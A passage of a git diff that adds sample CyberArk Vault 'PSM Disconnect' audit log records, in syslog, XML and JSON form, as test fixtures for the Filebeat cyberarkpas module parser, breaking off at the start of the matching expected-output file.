Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:54","IsoTimestamp":"2021-03-14T13:49:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-14T13:51:35Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:51:35</Timestamp>\n    <IsoTimestamp>2021-03-14T13:51:35Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:51:35","IsoTimestamp":"2021-03-14T13:51:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.14;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T10:33:30Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:33:30</Timestamp>\n    <IsoTimestamp>2021-03-15T10:33:30Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:30","IsoTimestamp":"2021-03-15T10:33:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T10:34:50Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:34:50</Timestamp>\n    <IsoTimestamp>2021-03-15T10:34:50Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:34:50","IsoTimestamp":"2021-03-15T10:34:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T11:12:09Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 04:12:09</Timestamp>\n    <IsoTimestamp>2021-03-15T11:12:09Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 04:12:09","IsoTimestamp":"2021-03-15T11:12:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T13:18:36Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:18:36</Timestamp>\n    <IsoTimestamp>2021-03-15T13:18:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.14;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:36","IsoTimestamp":"2021-03-15T13:18:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.14;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T14:08:11Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:11</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:11Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.14;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:11","IsoTimestamp":"2021-03-15T14:08:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.14;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T14:08:36Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:36</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:36","IsoTimestamp":"2021-03-15T14:08:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.14;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
+<5>1 2021-03-15T15:00:21Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 08:00:21</Timestamp>\n    <IsoTimestamp>2021-03-15T15:00:21Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"1\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615819476\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:00:21","IsoTimestamp":"2021-03-15T15:00:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/302_psm_disconnect.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/302_psm_disconnect.log-expected.json
index c785d0f3feec..74c0eb01cbfa 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/302_psm_disconnect.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/302_psm_disconnect.log-expected.json
@@ -94,18 +94,13 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:26Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Disconnect",
